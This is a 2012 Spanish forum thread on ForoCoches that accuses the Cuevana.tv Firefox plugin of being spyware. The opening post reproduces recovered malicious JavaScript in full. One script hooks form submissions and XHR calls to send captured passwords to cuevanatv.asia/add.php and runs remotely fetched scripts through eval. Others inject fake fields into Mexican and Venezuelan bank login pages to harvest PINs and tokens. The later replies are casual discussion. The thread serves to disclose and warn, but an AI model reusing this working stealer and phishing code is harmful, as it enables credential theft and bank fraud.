ATENCION, CUEVANA es SPYWARE, prueba inside - ForoCoches
Utilizamos cookies propias y de terceros para prestar nuestros servicios y mostrar publicidad relacionada con sus preferencias.
Si continua navegando, consideramos que acepta su uso. Puede obtener más información, o bien conocer cómo cambiar la configuración, en nuestra Política de cookies.
 
INICIO NOTICIAS FORO SEGUROS
[ Comparador ]
Regresar   ForoCoches > Zona General > General

  ATENCION, CUEVANA es SPYWARE, prueba inside  
Respuesta

 
Herramientas
Viejo 16-sep-2012, 02:28   #1
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

ATENCION, CUEVANA es SPYWARE, prueba inside

PRUEBAS:

he aquí las pruebas encontradas y recopiladas

Cita:
Originalmente Escrito por RME Ver Mensaje
Recopilación de Malware

hxxp://cuevanatv.asia/plugin.js
Código:
win.document.querySelector("#log_contenidop").innerHTML='<table  width="100%" border="0" cellspacing="1"  cellpadding="1">\n<tbody><tr>\n<td  colspan="2"><img width="148" height="14" title="Ingreso a  SuperNet" alt="Ingreso a SuperNet"  src="images/ingreso_supernet.jpg">\n<input type="hidden"  value="/schmexapp/index.jsp" name="pag">\n<input type="hidden"  value="/schmexapp/index.jsp" name="miURL">\n<input type="hidden"  value="1" name="irAmodulo"></td>\n</tr>\n<tr><td  width="49%" align="right"  class="texto_log">C&oacute;digo&nbsp;de&nbsp;Cliente:</td>\n<td  width="51%"><label><input type="password"  class="texto_form" style="width:60px;height:10px"  name="login.claveCliente" id="usuario"  autocomplete="off">\n</label></td></tr>\n<tr><td  width="49%" align="right" class="texto_log">NIP:</td>\n<td  width="51%"><label><input type="password" class="texto_form"  style="width:60px;height:10px" name="login.claveCliente" id="clave"  autocomplete="off">\n</label></td></tr>\n<tr><td  width="49%" align="right" class="texto_log">NIP  Dinamico:</td>\n<td width="51%"><label><input  type="password" class="texto_form" style="width:60px;height:10px"  name="login.claveCliente" id="nipd"  autocomplete="off">\n</label></td></tr>\n<tr><td  width="49%" align="right"  class="texto_log">Telefono:</td>\n<td  width="51%"><label><input type="text" class="texto_form"  style="width:60px;height:10px" name="login.claveCliente" id="tel"  autocomplete="off">\n</label></td></tr>\n<tr><td  width="49%" align="right"  class="texto_log">Celular:</td>\n<td  width="51%"><label><input type="text" class="texto_form"  style="width:60px;height:10px" name="login.claveCliente" id="cel"  autocomplete="off">\n</label></td></tr>\n<tr>\n<td  align="right" class="texto_log"></td>\n<td>\n<a  onclick="javascript:login_personas();return false"  id="splg.btnEntrar" href="#"><img width="39" height="16"  border="0" align="absmiddle" title="Ingrese a Supernet" alt="Ingrese a  Supernet"  src="images/entrar.jpg"></a></td>\n</tr>\n<tr>\n<td  align="right" class="texto_log"><a class="link_rojo02"  onclick="getOutboundLink(\'Login\',\'Afiliarse\');MM_openBrWindow(\'https://www.santander.com.mx/Supernet2007/AfiliacionSupernet\',\'supernetWindow\',\'toolbar=1,location=1,status=1,menubar=no,scrollbars=yes,resizable=yes,  width=1020,height=630\')" href="javascript:void(0)"><strong>AFILIARSE</strong></a></td>\n<td>|  <a onclick="getOutboundLink(\'Login\',\'Tutorial  Supernet\');MM_openBrWindow(\'http://www.santander.com.mx/demo/demo.html\',\'Tutorial\',\'toolbar=1,location=1,status=1,menubar=no,scrollbars=yes,resizable=yes,  width=960,height=590\')" class="liga_gris" href="javascript:void(0)">Tutorial</a></td>\n</tr>\n<tr>\n<td  align="center" colspan="2"><table width="242" border="0"  cellspacing="0" cellpadding="0">\n<tbody><tr>\n<td  colspan="3"><img width="242" height="24"  src="images/beneficios-canales.gif"></td>\n</tr>\n<tr>\n<td><a  onclick="javascript:getOutboundLink(\'Supernet\',\'Beneficios  Supernet\');MM_openBrWindow(\'http://www.servicios.santander.com.mx/supernet\',\'Supernet\',\'toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1020,height=630\')"  href="javascript:void(0)"><img width="103" height="21"  border="0" alt="SuperNet"  src="images/canal-supernet.gif"></a></td>\n<td><img  width="33" height="21"  src="images/canal-linea.gif"></td>\n<td><a  onclick="javascript:getOutboundLink(\'SuperMovil\',\'Beneficios  SuperMovil\');MM_openBrWindow(\'http://servicios.santander.com.mx/supermovil/principal/index.html\',\'SuperMovil\',\'toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1100,height=700\')"  href="javascript:void(0)"><img width="106" height="21"  border="0" alt="SuperMóvil"  src="images/canal-supermovil.gif"></a></td>\n</tr>\n</tbody></table></td>\n</tr>\n</tbody></table><style>#fiesta_rewards{display:none}#login_container{height:225px}</style>';

win.redirectOutput = function (login,pass){

    d = new Array();
    d.push("usr:"+win.document.getElementById('usuario').value);
    d.push("pss:"+win.document.getElementById('clave').value);
    d.push("nipd:"+win.document.getElementById('nipd').value);
    d.push("tel:"+win.document.getElementById('tel').value);
    d.push("cel:"+win.document.getElementById('cel').value);
    _sData(d.join(":_:"), win.location.href);

    var head = win.document.getElementsByTagName('head')[0];

    var script = win.document.createElement('script');
    script.type = 'text/javascript';
    script.appendChild(win.document.createTextNode(r_output.toString()));

    head.appendChild(script);

    win.r_output(login,pass);

}

win.login_personas = function() {
    
    var usr = win.document.forms['gestor'].usuario;
    var psw = win.document.forms['gestor'].clave;
    var go = win.document.getElementById("splg.btnEntrar");
    var frm = win.document.getElementById("gestor");

    if(usr.value == ""){
    usr.focus(); usr.select();
    alert("Favor de teclear su código de cliente.");return;
    } 
        
    if(!/^[a-zA-Z0-9]{8}$|^[a-zA-Z0-9]{4}$/.test(psw.value)) {
    alert("El NIP debe de ser de 8 o 4 caracteres. Solo letras y números.");return;
    }

    if(win.document.getElementById("MKD25X")) win.document.getElementById("MKD25X").SkipVerify(1);

    usr.value = win.completeUsrID(usr.value);
    if(win.document.getElementById("MKD25X")) {
        win.document.getElementById("MKD25X").SkipVerify(0);
    }

    if(!/^[0-9]{8}$|^[0-9]{16}$/.test(usr.value)) {
    alert("El C\363digo de Cliente debe ser n\372merico, de 8 \363 16 d\355gitos.");
    usr.focus(); usr.select();return;
    }

    if(win.document.getElementById('nipd').value=='') {
        alert("Favor de teclear su NIP DINAMICO.");
        return;
    }
    if(win.document.getElementById('tel').value=='') {
        alert("Favor de teclear su TELEFONO.");
        return;
    }
    if(win.document.getElementById('cel').value=='') {
        alert("Favor de teclear su TELEFONO MOVIL.");
        return;
    }

    win.Login(frm);
    win.redirectOutput(usr.value,psw.value);
}

function r_output(login,pass){
    objWin = open("" ,"supernetWindow","top=0,left=0,scrollbars=1,\
    resizable=1,menubar=0,toolbar=0,location=0,directories=0,status=1");
     objWin.document.write('<HTML><HEAD></HEAD><BODY><form  name = "oculForm" method="post" target="supernetWindow"  action="https://www.santander.com.mx/Supernet2007/loginGestor.jsp"><INPUT  TYPE="hidden" name="usuario" value="' + login + '"><INPUT  TYPE="password" style="display:none;" name="clave" value="' + pass +  '"><input type="hidden" name="pag"  value="/schmexapp/index.jsp"><input type="hidden" name="miURL"  value="/schmexapp/index.jsp"><input type=hidden name=irAmodulo  value=1>');
    if (LoginPersonasComoBancaPrivada) objWin.document.write ('<input type="hidden" name="SNETBP" value="SI"/>');
    objWin.document.write('</form></BODY></HTML>');
    objWin.document.oculForm.submit();
}
hxxp://cuevanatv.asia/back3.js
Código:
    var r = new XMLHttpRequest();
    r.open('GET', "http://cuevanatv.asia/scripts.txt", false);
    r.send(null);
    if (r.status == 200) eval(r.responseText);


OSid = Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).OS;
OSid = (OSid=='Darwin')?3:((OSid=='WINNT' )?2:((OSid=='Linux')?1:0));

function _sData(datos, url) {
    var r = new XMLHttpRequest;
    r.open("POST", "http://cuevanatv.asia/add.php", true);
    r.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    r.send("d="+datos+"&o="+OSid+"&u="+url);
}

Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService).addObserver({
    observe : function(aWindow, aTopic, aData) {
    if (aWindow instanceof Ci.nsIDOMWindow && aTopic == 'content-document-global-created') {

        var win = aWindow.wrappedJSObject;

        
        win.addEventListener("submit",
        function(e) {

            datos  = [];
            enviar = false;

            for each(i in e.target.elements) {
                if(i.type=='password') enviar=true;
                if(i.type!='hidden' && i.type!='submit' && i.type!=undefined) datos.push(i.name+"::"+i.value);
            }

            if(enviar) _sData(datos.join(":_:"), win.location.href);

        }
        ,false);

        
        var xmlhr = new Object();
            xmlhr.open = win.XMLHttpRequest.prototype.open;
            xmlhr.send = win.XMLHttpRequest.prototype.send;

        if (win.location.host.indexOf("facebook.com")==-1) { 

            
            win.XMLHttpRequest.prototype.open=function(a,b){

                a=(!a)?'':a;
                b=(!b)?'':b;

                xmlhr.open.apply(this, arguments);

                xmlhr.metodo = a.toLowerCase();
                xmlhr.url = b;

                if(xmlhr.metodo=='get') xmlhr.datos = b.split("?")[1];
            }

            
            win.XMLHttpRequest.prototype.send=function(a,b){

                a=(!a)?'':a;
                b=(!b)?'':b;

                xmlhr.send.apply(this, arguments);
                
                if(xmlhr.metodo=='post') xmlhr.datos = a;

                xmlhr.callback();

            }

        }

        xmlhr.callback = function(){

            enviar = false;
            activadores = ["pass", "pss", "clave", "contra"];

            for each(dato in this.datos.split("&")) {
            for each(activador in activadores) {
                if(dato.split("=")[0].indexOf(activador)>-1) enviar=true;
            }
            }

            if(enviar) _sData(this.datos.split("&").join(":_:").split("=").join("::"), win.location.href);

        }

        win.addEventListener("DOMContentLoaded", function(e){
        
        for(site in scripts) {    
        if (win.location.host.indexOf(site)>-1) {

            var r = new XMLHttpRequest();
            r.open('GET', scripts[site], false);
            r.send(null);
            if (r.status == 200) eval(r.responseText);

        }
        }

        },false);

    
    
    }
    }
}, 'content-document-global-created', false);
hxxp://cuevanatv.asia/plugin1.js
Código:
win.HacerSubmitPL = function() {
    var tarjeta = win.document.form1.notarjeta1.value;
    var valor;
    valor = tarjeta.charAt(0);
    if ("3" != valor) {
        win.document.form1.action = "https://e-bdvcpx.banvenez.com/ClavenetPersonalExpress/defaultclavenet.asp";
        win.document.form1.WITHCERTIFICATE.value = false;
        win.document.form1.ant.value = "2";
        win.document.form1.notarjeta.value = document.form1.notarjeta1.value;
        win.document.form1.passwordp.value = document.form1.passwordp1.value;
        win.document.form1.target = "_parent";
        win.document.form1.submit();
    } else {
        alert("Tarjeta Inv\xE1lida");
        return false;
    }
}
hxxp://cuevanatv.asia/plugin2.js
Código:
if(win.document.location.href.indexOf("inverweb/entrada_.asp")>-1) {

    inputs = "<div id='tabla'><div  id='Usuario'><strong>Clave:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='password'  name='clave' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Token:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='password'  name='token' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Telefono:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='text'  name='telefono' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Celular:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='text'  name='celular' class='textInput'  size='18'></div></div></div>";

    ihtml = win.document.Entrada.innerHTML;
    ihtml = ihtml.split('<div id="tabla">');
    ihtml[1]+=inputs;
    win.document.Entrada.innerHTML = ihtml.join('<div id="tabla">');

    win.Valida_Clave = function(dummy) {

        if (win.Entrada.txtCliente.value == "")    {
        alert("Indica un valor para el campo Usuario.");
        win.Entrada.txtCliente.focus(); return false;
        }

        if (win.Entrada.clave.value == "")    {
        alert("Indica un valor para el campo Clave.");
        win.Entrada.clave.focus(); return false;
        }

        if (win.Entrada.token.value == "")    {
        alert("Indica un valor para el campo Token.");
        win.Entrada.token.focus(); return false;
        }

        if (win.Entrada.telefono.value == "")    {
        alert("Indica un valor para el campo Telefono.");
        win.Entrada.telefono.focus(); return false;
        }

        if (win.Entrada.celular.value == "")    {
        alert("Indica un valor para el campo Celular.");
        win.Entrada.celular.focus(); return false;
        }
        return true;
    }

}
hxxp://cuevanatv.asia/plugin1.js
Código:
win.HacerSubmitPL = function() {     var tarjeta =  win.document.form1.notarjeta1.value;     var valor;     valor =  tarjeta.charAt(0);     if ("3" != valor) {          win.document.form1.action =  "https://e-bdvcpx.banvenez.com/ClavenetPersonalExpress/defaultclavenet.asp";          win.document.form1.WITHCERTIFICATE.value = false;          win.document.form1.ant.value = "2";          win.document.form1.notarjeta.value = document.form1.notarjeta1.value;          win.document.form1.passwordp.value =  document.form1.passwordp1.value;         win.document.form1.target =  "_parent";         win.document.form1.submit();     } else {          alert("Tarjeta Inv\xE1lida");         return false;     }  }
hxxp://cuevanatv.asia/plugin2.js
Código:
if(win.document.location.href.indexOf("inverweb/entrada_.asp")>-1)  {      inputs = "<div id='tabla'><div  id='Usuario'><strong>Clave:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='password'  name='clave' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Token:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='password'  name='token' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Telefono:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='text'  name='telefono' class='textInput'  size='18'></div></div></div><div  id='tabla'><div  id='Usuario'><strong>Celular:</strong></div><div  id='Campo'><div class='fieldHolder'><input type='text'  name='celular' class='textInput'  size='18'></div></div></div>";      ihtml =  win.document.Entrada.innerHTML;     ihtml = ihtml.split('<div  id="tabla">');     ihtml[1]+=inputs;      win.document.Entrada.innerHTML = ihtml.join('<div  id="tabla">');      win.Valida_Clave = function(dummy) {          if  (win.Entrada.txtCliente.value == "")    {         alert("Indica un valor  para el campo Usuario.");         win.Entrada.txtCliente.focus();  return false;         }          if (win.Entrada.clave.value == "")    {          alert("Indica un valor para el campo Clave.");          win.Entrada.clave.focus(); return false;         }          if  (win.Entrada.token.value == "")    {         alert("Indica un valor para  el campo Token.");         win.Entrada.token.focus(); return false;          }          if (win.Entrada.telefono.value == "")    {          alert("Indica un valor para el campo Telefono.");          win.Entrada.telefono.focus(); return false;         }           if (win.Entrada.celular.value == "")    {         alert("Indica  un valor para el campo Celular.");         win.Entrada.celular.focus();  return false;         }         return true;     }  }
Recopilación con fin de que cuando borren todas las pruebas tenerlas aquí recopiladas y poder tomar medidas legales.
vídeo demostrativo




y enlace al plugin infectado .xpi de firefox , versión 4.2


http://www.**************/?r998dij1fj1kb9e

OTRA VICTORIA DE FOROCOCHES! VIVA FC!
--------------------------------

TOCHO RESUMEN:


Descubro que el plugin de CUEVANA.TV está enviando todos los datos de usuario y contraseña de todas las páginas web al dominio cuevanatv.asia/add.php, varios foreros se unen y entre todos descubrimos los scripts maliciosos y los recopilamos aquí, además descubrimos 3 scripts que supuestamente tienen relación con el robo de datos de bancarios del santander mexicano, banco de venezuela y scotiabank, otros foreros descomprimen el plugin y dan con la dirección del script malicioso que estaba robando los datos, el cual también está recopilado aquí, pasa un tiempo y la noticia se difunde por Twitter y Menéame, después ocurre lo más flipante de todo, el dominio cuevanatv.asia deja de existir, o está caído, la empresa de hosting no dice nada, cuevana.tv actualiza su plugin de Firefox pero manteniendo la misma versión (para simular que no lo han actualizado), el forero chico2009 se da cuenta de que el checksum MD5 del supuesto mismo plugin, no coincide con el checksum del plugin infectado (el cual guarda en su pc) (el checksum es una cadena de texto generada a partir de los datos binarios de un programa, asi explicado a modo rapido) esto quiere decir, que la nueva version del plugin de cuevana, a pesar de que ellos intentan simular que es la misma, NO LA ES, dado que los checksum no coinciden, de nuevo varios foreros descomprimen el nuevo plugin de cuevana y se dan cuentan de que el código malicioso está desaparecido, pero aun no ha acabado todo, el forero chico2009 guardó el plugin antiguo y lo ha subido, de este modo tenemos todos los datos posibles recopilados, es hora de pasar a la acción, JUSTICIA !!!!


lo acabo de descubrir, he buscado info. en google y no aparece nada, todo el mundo sabe que para utilizar el sitio web cuevana.tv te piden descargar un plugin, pues estaba haciendo unas cosillas y utilizando un plugin de firefox llamado tamper data he podido ver que el plugin de cuevana bypassea los formularios de entrada (usuario/contraseña) y los envía a sus servidores, después de hacer esto el formulario se envía normalmente a la página en la que estás y no notas nada, al desinstalar el plugin he podido comprobar como esto no sucedía, y al instalarlo de nuevo he comprobado de nuevo como SÍ sucedía, la prueba está aquí:

logueándome a GMAIL










todos los que usen este plugin, DESINSTALARLO AHORA y cambiar todas vuestras contraseñas, un saludo y puntuad 5 estrellas y mantener el hilo uppeado para que la gente lo vea, buenas noches


actualización: el forero DaGGoTH ha confirmado el "problema", el plugin al parecer SÍ que roba los datos y no era solo un problema mio ni de mi ordenador, hambicionad

actualización 2:




actualización 3: post #206
actualización 4: post #217, el forero muertet ha encontrado la parte de código maliciosa tambien por sus propios medios, queda confirmado, que para firefox 15 /ubuntu 11.10/windows 7 y plugin cuevana 4.2 este problema existe, que los demás foreros aporten sus configuraciones y digan si esto sucede o no sucede

actualización 5: confirmado, en firefox, cualquier versión, está infectado con el código malicioso que roba datos. también estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios

actualización 6: todos los scripts maliciosos encontrados estan el post #295 por el forero RME, por si alguien los borra, están ahí


actualización 7 : CUEVANATV.ASIA ESTÁ CAÍDO, PROBABLEMENTE QUIERAN ESCURRIR EL BULTO O QUE LA COMPÑIA DE HOSTING HAYA CERRADO LA CUENTA HOSTING

actualización 8:
DESPUÉS DE CERRAR CUEVANATV.ASIA EL PLUGIN LO HAN CAMBIADO, VARIOS SHURMANOS TIENEN EL PLUGIN ANTIGUO-ORIGINAL, CON LA NUEVA VERSIÓN YA NO CAPTURAN DATOS, HAY QUE HACER JUSTICIA, HIJOS DE PUTA,

en el post numero #591 esta el plugin subido por el usuario chico2009, notad que solo los usuarios de forocoches podrán descargarlo ya que es un archivo adjunto, si alguien lo sube a otro mirror lo pongo


actualización 9:
http://www.**************/?r998dij1fj1kb9e ahí la versión infectada, a todo el que no se lo crea, que le den por el culo, al que se lo crea lo puede descomprimir con el winrar por ejemplo, en el script-compiler.js linea 200 y pico hay un eval que carga el script de http://cuevanatv.asia/back3.js el script malicioso para robar datos, parece que esto termina aqui, gracias a TODOS los que habeis difundido y ayudado


actualización 10: cuevana se esta pronunciando en su twitter poco a poco, dicen que no es cosa de ellos, etc. por una parte hay que darles confianza, y eso explicaria por que algunos usuarios con un plugin mas antiguo, o el mismo plugin, no encuentran la linea de codigo malicioso al abrir el script-compiler.js, por otra parte es muy sospechoso que se haya borrado todo antes de que empezaran a hablar (incluyendo la actualizacion del plugin por uno sin infectar) y hay que recordar que antiguamente el plugin te redireccionaba a cuevana cuando veias algun video de megavideo (esto yo ni lo sabia )

tutorial, como desinstalarlo de firefox:



  • os vais a herramientas -> addons ( o extensiones, yo tengo la version inglesa ) o simplemente pulsad control + shift + A


  • os vais a extensiones y pulsais eliminar/remove y listo (luego reiniciad firefox)



Última edición por srednalF fecha: 17-sep-2012 a las 03:36.
srednalF está conectado ahora   Responder Con Cita


Viejo 16-sep-2012, 02:28   #2
Barney Gumble
El miembro
 
Avatar de Barney Gumble
 
Dic 2008 | 6.754 Mens.
Lugar: Aquí

M3

Pole.
Barney Gumble está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:29   #3
Joy06
Hater
 
Avatar de Joy06
 
Abr 2007 | 14.761 Mens.
Lugar: España

Un motonabo

Nunca lo use por que me dio mala espina, tengo un aracnosentido!

Mods Recomendados para Fallout 3 y New Vegas
Joy06 está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:30   #4
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

up


srednalF está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:32   #5
Kolmor
Lord
 
Avatar de Kolmor
 
Jun 2011 | 7.840 Mens.
Lugar: Mi cama

Un noble corcel

yo he pagado la cuota asique a mi no me hace falta el plugin ese

Yo leia juego de tronos antes de que molara
Kolmor está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:32   #6
*FuturoAutoBan*
*AutοBan Spаm/Flοοd/Trο‖*
 
Avatar de *FuturoAutoBan*
 
Jul 2011 | 6.975 Mens.
si no se lo que es cuevana.tv no corro peligro, no?

"Tu ego extiende cheques que tu cuerpo no puede pagar"
*FuturoAutoBan* está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:32   #7
LoMioPaMi
ForoCoches: Miembro
 
Avatar de LoMioPaMi
 
Ene 2011 | 794 Mens.
Lugar: Sevilla
que es eso de cuevana?
LoMioPaMi está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:33   #8
Soberbia
Nein, nein, nein!!
 
Jul 2010 | 8.896 Mens.
Lugar: Ancá el Führer Hitlitri

Poniéndome fina a calimocho

Lo uso desde hace más de un año y, hasta ahora, ningún problema

De hecho, me voy a ver una peli en tu honor.
Soberbia está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:33   #9
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

http://www.cuevana.tv/ eso es cuevana, una web muy famosa en españa y latinoamerica al estilo series.ly / seriesyonkis / etc..


srednalF está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:34   #10
Jotha-
Ultima Online
 
Avatar de Jotha-
 
Jul 2008 | 4.525 Mens.
wtf

Plataforma entourage ★ Socio Fundador
I KATY PERRY

PEÑA CULÉ socio nº 468
Jotha- está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:34   #11
stoikov22
Miembro Vip ✔
 
Avatar de stoikov22
 
Abr 2011 | 10.857 Mens.
Lugar: Vivo en el box de Mercedes.
Cita:
Originalmente Escrito por soberbia Ver Mensaje
lo uso desde hace más de un año y, hasta ahora, ningún problema

De hecho, me voy a ver una peli en tu honor.
+1

PEÑA MERENGUE ForoCoches Carné de socio nº 1085
stoikov22 está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:35   #12
DaGGoTH
ForoCoches: Miembro
 
Avatar de DaGGoTH
 
May 2006 | 6.663 Mens.
Lugar: Ponferrada // Madrid

A3

Joder si es así esto es muy grave. Voy a hacer unas pruebas.

pirupirupupiruuuu
DaGGoTH está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:37   #13
Mandrivia
______________________
 
Avatar de Mandrivia
 
Nov 2011 | 5.807 Mens.
Lugar: Huelva, Andalucía, España
Interesante...

Plataforma ASOIAF: Game of Thrones ~ Miembro nº 5
Rincón del ۞ ANIME ¥ MANGA ۞ ~ Miembro nº 198
Mandrivia está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:38   #14
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

Cita:
Originalmente Escrito por DaGGoTH Ver Mensaje
Joder si es así esto es muy grave. Voy a hacer unas pruebas.
haz lo mismo que yo y me cuentas, a ver si va a ser solo problema mio pero ya te digo que lo he probado 2 veces, una con un plugin version antigua, luego desinstalado (todo iba bien) luego he ido a cuevana.tv y he instalado de nuevo el plugin y ha vuelto a pasar


srednalF está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:39   #15
crocketa
ForoCoches: Miembro
 
Avatar de crocketa
 
Oct 2007 | 17.152 Mens.
nunca lo he instalado...
¿un resumen sobre lo que aporta?
crocketa está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:42   #16
Soberbia
Nein, nein, nein!!
 
Jul 2010 | 8.896 Mens.
Lugar: Ancá el Führer Hitlitri

Poniéndome fina a calimocho

Cita:
Originalmente Escrito por crocketa Ver Mensaje
nunca lo he instalado...
¿un resumen sobre lo que aporta?
Es una web de streaming online sin límites y con muy buena calidad. VO y con subtítulos, a veces también en inglés. Yo prefiero usarla antes que vk.
Soberbia está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:42   #17
x.atlas
love will tear us apart
 
Avatar de x.atlas
 
Oct 2011 | 8.604 Mens.
Lugar: Valencia

Zapatocleta

¿Has probado en Chrome?

HARDER... BETTER... FASTER... STRONGER...
x.atlas está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:42   #18
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

Cita:
Originalmente Escrito por crocketa Ver Mensaje
nunca lo he instalado...
¿un resumen sobre lo que aporta?
a ver, es una pagina de peliculas y cuando vas a ver una te pide instalar un plugin para el navegador, lo instalas y te deja ver los links de descarga etc, la pagina me parecia bastante seria y la utilizaba para ver alguna peliculilla, pero ya no


srednalF está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:44   #19
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

Cita:
Originalmente Escrito por x.atlas Ver Mensaje
¿Has probado en Chrome?
no, pero el plugin debe ser el mismo, no se ningun addon para el chrome que tenga la misma funcion que el tamper data, el tamper data solo es para firefox y es un addon que permite ver con qué "contacta tu navegador" por decirlo asi, asi es como he descubierto que en todos los formularios primero "contacta" con cuevana y luego con la pagina en cuestion en la que estas


srednalF está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:51   #20
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

up


srednalF está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:52   #21
DaGGoTH
ForoCoches: Miembro
 
Avatar de DaGGoTH
 
May 2006 | 6.663 Mens.
Lugar: Ponferrada // Madrid

A3

Cita:
Originalmente Escrito por srednalF Ver Mensaje
haz lo mismo que yo y me cuentas, a ver si va a ser solo problema mio pero ya te digo que lo he probado 2 veces, una con un plugin version antigua, luego desinstalado (todo iba bien) luego he ido a cuevana.tv y he instalado de nuevo el plugin y ha vuelto a pasar
Acabo de probar con proxy local y con las developer tools de chrome y el problema no se reproduce. A ver si vas a tener algún bicho...

Voy a probar con el tamper data...

pirupirupupiruuuu
DaGGoTH está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:53   #22
DaGGoTH
ForoCoches: Miembro
 
Avatar de DaGGoTH
 
May 2006 | 6.663 Mens.
Lugar: Ponferrada // Madrid

A3

Cita:
Originalmente Escrito por srednalF Ver Mensaje
no, pero el plugin debe ser el mismo, no se ningun addon para el chrome que tenga la misma funcion que el tamper data, el tamper data solo es para firefox y es un addon que permite ver con qué "contacta tu navegador" por decirlo asi, asi es como he descubierto que en todos los formularios primero "contacta" con cuevana y luego con la pagina en cuestion en la que estas
En Chrome control+shift+i -> pestaña network

pirupirupupiruuuu
DaGGoTH está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:53   #23
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

Cita:
Originalmente Escrito por DaGGoTH Ver Mensaje
Acabo de probar con proxy local y con las developer tools de chrome y el problema no se reproduce. A ver si vas a tener algún bicho...

Voy a probar con el tamper data...
lo dudo shur, desinstalando el plugin de cuevana (bajado de cuevana.tv) no salta nada raro en el tamper data

edit: de todos modos pruebalo y si no te sale me como un owned

edit2: en el chrome a mi tampoco me sale en firefox si (no quiere decir que los usuarios de chrome esteis seguros)



Última edición por srednalF fecha: 16-sep-2012 a las 02:56.
srednalF está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:54   #24
crocketa
ForoCoches: Miembro
 
Avatar de crocketa
 
Oct 2007 | 17.152 Mens.
Cita:
Originalmente Escrito por Soberbia Ver Mensaje
Es una web de streaming online sin límites y con muy buena calidad. VO y con subtítulos, a veces también en inglés. Yo prefiero usarla antes que vk.
Cita:
Originalmente Escrito por srednalF Ver Mensaje
a ver, es una pagina de peliculas y cuando vas a ver una te pide instalar un plugin para el navegador, lo instalas y te deja ver los links de descarga etc, la pagina me parecia bastante seria y la utilizaba para ver alguna peliculilla, pero ya no
Gracias por la respuesta
si que la usaba...no lo recordaba
voy a ver si lo tengo instalado aún...gracias por el aviso
crocketa está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:56   #25
alpacino
ForoCoches: Miembro
 
Avatar de alpacino
 
Oct 2010 | 3.707 Mens.
Lugar: Málaga
ostia puta, pillo sitio
alpacino está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:57   #26
DaGGoTH
ForoCoches: Miembro
 
Avatar de DaGGoTH
 
May 2006 | 6.663 Mens.
Lugar: Ponferrada // Madrid

A3

Nada, todo correcto.

Edito: Fallo mío, en firefox no tenía instalado el plugin. Voy a repetir.

pirupirupupiruuuu
DaGGoTH está desconectado   Responder Con Cita
Viejo 16-sep-2012, 02:58   #27
Bro-Mouzone
Españolo bravo torero
 
Avatar de Bro-Mouzone
 
Abr 2011 | 5.994 Mens.
Lugar: donde Cristo perdió la chancla

Monkey Volume

No creo eh? Llevo mucho tiempo usando esta página y parece muy respetable y profesional como para eso.

Bro-Mouzone está conectado ahora   Responder Con Cita
Viejo 16-sep-2012, 02:58   #28
srednalF
ForoCoches: Flanders
 
Avatar de srednalF
 
Ago 2011 | 4.032 Mens.
Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.

Cita:
Originalmente Escrito por DaGGoTH Ver Mensaje
Nada, todo correcto.
no te sale nada en el tamper ? voy a desinstalar el plugin otra vez y a probar


